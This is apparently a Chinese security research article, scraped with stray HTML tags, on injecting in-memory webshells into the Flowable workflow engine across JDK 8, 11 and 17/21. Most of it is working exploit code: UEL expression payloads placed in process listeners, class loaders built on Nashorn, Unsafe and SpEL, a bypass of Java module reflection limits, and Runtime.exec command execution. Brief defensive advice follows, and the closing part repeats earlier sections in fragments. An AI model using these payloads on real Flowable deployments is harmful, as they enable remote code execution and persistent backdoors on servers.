Flowable流程引擎全版本JDK内存马注入技术研究<\/h1>

1. 前置知识<\/h2>

1.1 Flowable简介<\/h3>

Flowable是一个用Java编写的轻量级业务流程引擎(BPMN)，支持业务流程建模与执行。关键特性包括：<\/p>

支持UEL(Unified Expression Language)表达式<\/li>
提供流程定义、执行、任务管理等功能<\/li>

支持流程监听器配置<\/li> <\/ul>

1.2 漏洞背景<\/h3>
Flowable引擎允许在流程监听器中插入UEL表达式，当流程达到触发条件时会对表达式进行解析执行。这一特性可能被滥用实现任意代码执行。<\/p>

2. JDK 8环境下的内存马注入<\/h2>

2.1 利用原理<\/h3>
在JDK 8中，可以直接使用当前线程的contextClassLoader反射调用defineClass方法加载恶意类。<\/p>

2.2 利用代码<\/h3>

''<\/span>.getClass<\/span>().forName<\/span>('javax.script.ScriptEngineManager'<\/span>).newInstance<\/span>().getEngineByName<\/span>('js'<\/span>).eval('
<\/span><\/span><\/span>var base64Str = "yv66vg...";
<\/span><\/span><\/span>var clsString = java.lang.Class.forName("java.lang.String");
<\/span><\/span><\/span>var bytecode;
<\/span><\/span><\/span>try {
<\/span><\/span><\/span>    var decoder = java.lang.Class.forName("java.util.Base64").getMethod("getDecoder").invoke(null);
<\/span><\/span><\/span>    bytecode = decoder.getClass().getMethod("decode", clsString).invoke(decoder, base64Str);
<\/span><\/span><\/span>} catch (ee) {
<\/span><\/span><\/span>    var decoder = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance();
<\/span><\/span><\/span>    bytecode = decoder.getClass().getMethod("decodeBuffer", clsString).invoke(decoder, base64Str);
<\/span><\/span><\/span>}
<\/span><\/span><\/span>var clsByteArray = (new java.lang.String("a").getBytes().getClass());
<\/span><\/span><\/span>var clsInt = java.lang.Integer.TYPE;
<\/span><\/span><\/span>var defineClass = java.lang.Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", [clsByteArray, clsInt, clsInt]);
<\/span><\/span><\/span>defineClass.setAccessible(true);
<\/span><\/span><\/span>var clazz = defineClass.invoke(java.lang.Thread.currentThread().getContextClassLoader(), bytecode, new java.lang.Integer(0), new java.lang.Integer(bytecode.length));
<\/span><\/span><\/span>clazz.newInstance();
<\/span><\/span><\/span>'<\/span>)
<\/span><\/span><\/code><\/pre>2.3 利用步骤<\/h3>

新建流程<\/li>
在监听器中插入上述表达式<\/li>
执行流程触发表达式解析<\/li>
<\/ol>
3. JDK 11环境下的内存马注入<\/h2>
3.1 JDK 11的限制<\/h3>
JDK 11中直接使用defineClass会报错：<\/p>
Unable to make protected final java.lang.Class java.lang.ClassLoader.defineClass(byte[],int,int) throws java.lang.ClassFormatError accessible: module java.base does not "opens java.lang" to module jdk.scripting.nashorn.scripts
<\/code><\/pre>
3.2 绕过方案<\/h3>
使用Unsafe类的defineAnonymousClass方法进行类加载，但有以下限制：<\/p>

被加载的Class必须没有包名<\/li>
或者包名与第一个参数Class的包名一致<\/li>
<\/ol>
3.3 利用代码<\/h3>
$<\/span>{''<\/span>.getClass<\/span>().forName<\/span>("javax.script.ScriptEngineManager"<\/span>).newInstance<\/span>().getEngineByName<\/span>("JavaScript"<\/span>).eval("
<\/span><\/span><\/span>var ClassBytes = java.util.Base64.getDecoder().decode('yv66vg...');
<\/span><\/span><\/span>var safeClass = java.lang.Class.forName('sun.misc.Unsafe');
<\/span><\/span><\/span>var safeCon = safeClass.getDeclaredField('theUnsafe');
<\/span><\/span><\/span>safeCon.setAccessible(true);
<\/span><\/span><\/span>var unSafe = safeCon.get(null);
<\/span><\/span><\/span>var mem = unSafe.defineAnonymousClass(org.flowable.engine.impl.test.NoOpServiceTask.class, ClassBytes, null);
<\/span><\/span><\/span>mem.newInstance();
<\/span><\/span><\/span>"<\/span>)}
<\/span><\/span><\/code><\/pre>4. JDK 17\/21环境下的内存马注入<\/h2>
4.1 环境变化<\/h3>

Nashorn引擎在JDK 17中被移除<\/li>
Graal.js依赖默认被注释<\/li>
<\/ul>
4.2 利用方案<\/h3>
使用SpEL表达式通过org.springframework.cglib.core.ReflectUtils进行类加载<\/p>
4.3 利用代码<\/h3>
$<\/span>{''<\/span>.getClass<\/span>().forName<\/span>("org.springframework.expression.spel.standard.SpelExpressionParser"<\/span>).newInstance<\/span>().parseExpression<\/span>("
<\/span><\/span><\/span>T(org.springframework.cglib.core.ReflectUtils).defineClass(
<\/span><\/span><\/span>    'org.springframework.expression.Test',
<\/span><\/span><\/span>    T(org.apache.commons.io.IOUtils).toByteArray(
<\/span><\/span><\/span>        new java.util.zip.GZIPInputStream(
<\/span><\/span><\/span>            new java.io.ByteArrayInputStream(
<\/span><\/span><\/span>                T(java.util.Base64).getDecoder().decode('gzip + Base64')
<\/span><\/span><\/span>            )
<\/span><\/span><\/span>        )
<\/span><\/span><\/span>    ),
<\/span><\/span><\/span>    T(java.lang.Thread).currentThread().getContextClassLoader(),
<\/span><\/span><\/span>    null,
<\/span><\/span><\/span>    T(java.lang.Class).forName('org.springframework.expression.ExpressionParser')
<\/span><\/span><\/span>)"<\/span>).getValue<\/span>()}
<\/span><\/span><\/code><\/pre>4.4 关键注意事项<\/h3>

注入器类名必须在org.springframework.expression包下<\/li>
需要绕过高版本反射限制，使用Unsafe修改Module：<\/li>
<\/ol>
Class unsafeClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.misc.Unsafe"<\/span>);<\/span>
<\/span><\/span>Field unsafeField =<\/span> unsafeClass.<\/span>getDeclaredField<\/span>(<\/span>"theUnsafe"<\/span>);<\/span>
<\/span><\/span>unsafeField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Unsafe unsafe =<\/span> (<\/span>Unsafe)<\/span> unsafeField.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>Module module =<\/span> Object.<\/span>class<\/span>.<\/span>getModule<\/span>();<\/span>
<\/span><\/span>Class cls =<\/span> HelpUtils.<\/span>class<\/span>;<\/span>
<\/span><\/span>long<\/span> offset =<\/span> unsafe.<\/span>objectFieldOffset<\/span>(<\/span>Class.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"module"<\/span>));<\/span>
<\/span><\/span>unsafe.<\/span>getAndSetObject<\/span>(<\/span>cls,<\/span> offset,<\/span> module);<\/span>
<\/span><\/span><\/code><\/pre>5. 命令执行示例<\/h2>
5.1 通过SpEL表达式<\/h3>
$<\/span>{''<\/span>.getClass<\/span>().forName<\/span>("org.springframework.expression.spel.standard.SpelExpressionParser"<\/span>).newInstance<\/span>().parseExpression<\/span>("T(java.lang.Runtime).getRuntime().exec('open \/System\/Applications\/Calculator.app')"<\/span>).getValue<\/span>()}
<\/span><\/span><\/code><\/pre>5.2 直接反射调用<\/h3>
$<\/span>{''<\/span>.getClass<\/span>().forName<\/span>('java.lang.Runtime'<\/span>).getMethod<\/span>('getRuntime'<\/span>).invoke<\/span>(null<\/span>).exec<\/span>('open \/System\/Applications\/Calculator.app'<\/span>)}
<\/span><\/span><\/code><\/pre>6. 踩坑记录<\/h2>


高版本Spring兼容性问题<\/strong>：<\/p>

javax.servlet被jakarta.servlet替代<\/li>
报错示例：Java.lang.AbstractMethodError: Receiver class org.springframework.expression.Test4 does not define or inherit an implementation of the resolved method 'abstract org.springframework.web.servlet.ModelAndView handleRequest(jakarta.servlet.http.HttpServletRequest, jakarta.servlet.http.HttpServletResponse)' of interface org.springframework.web.servlet.mvc.Controller.<\/code><\/li>
<\/ul>
<\/li>

反编译问题<\/strong>：<\/p>

反编译内存马后可能缺少常量值<\/li>
需要通过-classpath添加依赖进行编译<\/li>
<\/ul>
<\/li>

JDK版本适配<\/strong>：<\/p>

内存马中的Object.class.getModule()方法在Java 9+才支持<\/li>
需要使用Java 9+的javac进行编译<\/li>
<\/ul>
<\/li>
<\/ol>
7. 防御建议<\/h2>

禁用不必要的表达式解析功能<\/li>
对流程监听器中的表达式进行严格过滤<\/li>
使用最新版本的Flowable引擎<\/li>
实施严格的代码审查和输入验证<\/li>
限制JVM的反射权限<\/li>
<\/ol>
8. 参考资源<\/h2>

Flowable表达式注入分析<\/a><\/li>
JDK高版本内存马技术研究<\/a><\/li>
Spring高版本适配问题<\/a><\/li>
Flowable漏洞利用分析<\/a><\/li>
<\/ol>

Flowable流程引擎全版本JDK内存马注入技术研究<\/h1>

1. 前置知识<\/h2>

1.2 漏洞背景<\/h3> Flowable引擎允许在流程监听器中插入UEL表达式，当流程达到触发条件时会对表达式进行解析执行。这一特性可能被滥用实现任意代码执行。<\/p>

2. JDK 8环境下的内存马注入<\/h2>

2.1 利用原理<\/h3> 在JDK 8中，可以直接使用当前线程的contextClassLoader反射调用defineClass方法加载恶意类。<\/p>

3. JDK 11环境下的内存马注入<\/h2>

4. JDK 17\/21环境下的内存马注入<\/h2>

4.2 利用方案<\/h3> 使用SpEL表达式通过org.springframework.cglib.core.ReflectUtils进行类加载<\/p>

5. 命令执行示例<\/h2>

8. 参考资源<\/h2> Flowable表达式注入分析<\/a><\/li> JDK高版本内存马技术研究<\/a><\/li> Spring高版本适配问题<\/a><\/li> Flowable漏洞利用分析<\/a><\/li> <\/ol>

1.2 漏洞背景<\/h3>
Flowable引擎允许在流程监听器中插入UEL表达式，当流程达到触发条件时会对表达式进行解析执行。这一特性可能被滥用实现任意代码执行。<\/p>

2.1 利用原理<\/h3>
在JDK 8中，可以直接使用当前线程的contextClassLoader反射调用defineClass方法加载恶意类。<\/p>

4.2 利用方案<\/h3>
使用SpEL表达式通过org.springframework.cglib.core.ReflectUtils进行类加载<\/p>

8. 参考资源<\/h2>

Flowable表达式注入分析<\/a><\/li>
JDK高版本内存马技术研究<\/a><\/li>
Spring高版本适配问题<\/a><\/li>
Flowable漏洞利用分析<\/a><\/li> <\/ol>